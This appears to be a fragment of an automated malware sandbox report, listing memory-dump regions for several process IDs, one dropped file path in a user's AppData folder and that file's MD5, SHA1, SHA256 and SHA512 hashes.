memory/4204-17-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4204-22-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

memory/4204-23-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4204-28-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1844-29-0x000000007543E000-0x000000007543F000-memory.dmp

memory/1844-30-0x0000000002240000-0x0000000002276000-memory.dmp

memory/1844-31-0x0000000004C50000-0x0000000005278000-memory.dmp

memory/1844-32-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/1844-33-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/1844-34-0x0000000004BC0000-0x0000000004BE2000-memory.dmp

memory/1844-45-0x00000000057A0000-0x0000000005806000-memory.dmp

memory/1844-44-0x0000000005430000-0x0000000005496000-memory.dmp

memory/1844-46-0x0000000005810000-0x0000000005B64000-memory.dmp

memory/1844-47-0x0000000005B70000-0x0000000005B8E000-memory.dmp

memory/1844-48-0x0000000005B90000-0x0000000005BDC000-memory.dmp

memory/1844-49-0x00000000073E0000-0x0000000007A5A000-memory.dmp

memory/1844-50-0x0000000006110000-0x000000000612A000-memory.dmp

memory/1844-51-0x0000000006E70000-0x0000000006F06000-memory.dmp

memory/1844-52-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/1844-53-0x0000000008010000-0x00000000085B4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Anemotaxis.Saf

MD5 18fc7a00c5b4cd7bf88445aaf24491bf
SHA1 8127f6999587c6b0bfde91fceac9d0106907b9d2
SHA256 38393e1abae0ed937471b6d4196ebbf100921142ea85d266b3505cc24a992fc2
SHA512 0127009c795974510ea898f320450e7bd0b76dd395374c4058adab95e39e27459306cde56de5b39cd38f053513b26eda0d76da34af8cb9ca352daa5d5323ebfb

memory/4204-55-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1844-56-0x00000000085C0000-0x000000000BED0000-memory.dmp

memory/4204-58-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1844-59-0x000000007543E000-0x000000007543F000-memory.dmp

memory/1844-63-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/4896-77-0x0000000001000000-0x0000000001016000-memory.dmp

memory/4896-76-0x0000000001000000-0x0000000002254000-memory.dmp

memory/1844-78-0x0000000075430000-0x0000000075BE0000-memory.dmp

memory/4204-81-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4896-82-0x0000000023C50000-0x0000000023CEC000-memory.dmp